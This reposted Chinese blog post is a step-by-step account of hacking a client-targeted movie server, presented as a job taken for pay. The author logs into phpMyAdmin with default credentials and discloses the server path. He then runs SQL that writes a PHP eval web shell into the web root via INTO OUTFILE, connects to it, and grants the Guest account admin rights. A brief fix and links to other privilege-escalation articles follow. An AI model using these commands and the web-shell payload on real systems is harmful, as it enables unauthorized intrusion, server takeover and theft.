关于PHPMYADMIN的入侵提权拿服务器

转载 2013年12月01日 23:06:53

转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e

作者不详

关于PHPMYADMIN的入侵提权拿服务器

1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.*

打开网站一看,发现是用FLEAPHP写的一个程序

因为刚好在研究FLEAPHP开源开发系统,大致了解一些语法,可是没有能利用的,而且整个服务器也只有这么一个网站

2.FleaPHP 为开发者轻松、快捷的创建应用程序提供帮助。FleaPHP 框架简单、清晰,容易理解和学习,并且有完全中文化的文档和丰富的示

例程序降低学习成本。
使用 FleaPHP 框架开发的应用程序能够自动适应各种运行环境,并兼容 PHP4 和 PHP5。


3.既然是PHP那肯定有PHPMYADMIN,尝试着在网站地址后 加入 61.147.*.*/phpmyadmin

哈哈,能直接打开,这时候,就差用户名和密码了

因为事先在看网站的时候,我直接在网站地址后加了个 61.147.*.*/ROOT

没想到能查看他的目录,所以,我在 PHPMYADMIN里面就用默认用户

ROOT ROOT

成功登陆

发现他有三个数据库。。这时候就要利用到 PHPMYADMIN的入侵了

4.首先 打开phpmyadmin

http://61.147.*.*/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

就是在PHPMYADMIN后面加 libraries/select_lang.lib.php

得到他的路径 C:APMhtdocsphpMyAdminlibraries

这个一定要记录下来

然后 进入PHPMYADMIN

用默认用户进去

运行 SQL语句

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[1]);?>");
select cmd from a into outfile "C:/APM/htdocs/phpMyAdmin/libraries/d.php";
Drop TABLE IF EXISTS a;


语句详细意思

创建一个A表 写入 <?php eval($_POST[1]);?>
熟悉这个的都知道 <?php eval($_POST[1]);?>这个就是一句话了

1是密码 可以自行修改

把里面的信息输出到 phpMyAdmin/libraries/d.php
这个文件

d.php 名字也可以自己入

Drop TABLE IF EXISTS a   如果有 A表 将删除


然后执行

OK 写入成功

这个时候用一句话连接

传上SHELL

进去 一查 原来是个WIN系统

开启GUEST 给予管理权限

服务器成功到手

1.5T的电影 呵呵


此方法一是爆出了路径 二是管理员大意 没有修改默认密码

所以

漏洞详细解决方法:
就是修改管理员密码

这样 可以阻止黑客进入PHPMYADMIN进行SQL运行

当然 IDC商也要禁止客户商的一些权限

这样就可以保证了

phpMyAdmin后台拿Shell方法及php爆路径方法

转自:http://kuxoo.com/phpMyAdmin/ [PhpMyAdmin后台拿Shell] CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` ...

PHPmyadmin漏洞和拿shell

phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘...
  • kkr3584
  • kkr3584
  • 2017年04月06日 09:31
  • 2463

注入总结:mysql+mssql手工注入常用命令总结

欢迎使用Markdown编辑器写博客判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是access MSSQL...

教你如何通过Mysql弱口令得到系统权限

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到! 首先,我简单说一下mysql弱口令得到系统...

服务器提权工具

  • 2013年04月22日 16:38
  • 132KB
  • 下载

总结常见网站服务器提权20种思路

1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限) 2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来...

Windows 2003服务器提权:用户权限和文件夹权限

一、用户权限 详细讲解windows 2003服务器的默认用户权限,包括SYSTEM、Administrator、Guest、IUSR_*、IWAM_*。 详细介绍windows ...

webshell提权拿服务器方法总结

今天有朋友希望更新一些关于提权的一些文章,加上小残今天有时间所以在这里为大家讲解下本人的一般拿到webshell的提权思路把。 1.我相信很多朋友刚拿到webshell以后都会尝试是...
  • xysoul
  • xysoul
  • 2015年03月20日 14:12
  • 1684

【日常】在某特定条件下提权夺取服务器权限

【日常】还是入侵的记录 仅作为学习交流之用

服务器提权二览

本文是biweilun结合自己的经验和网上的一些文章写出来的,希望大家喜欢 一:检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) ...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:关于PHPMYADMIN的入侵提权拿服务器
举报原因:
原因补充:

(最多只允许输入30个字)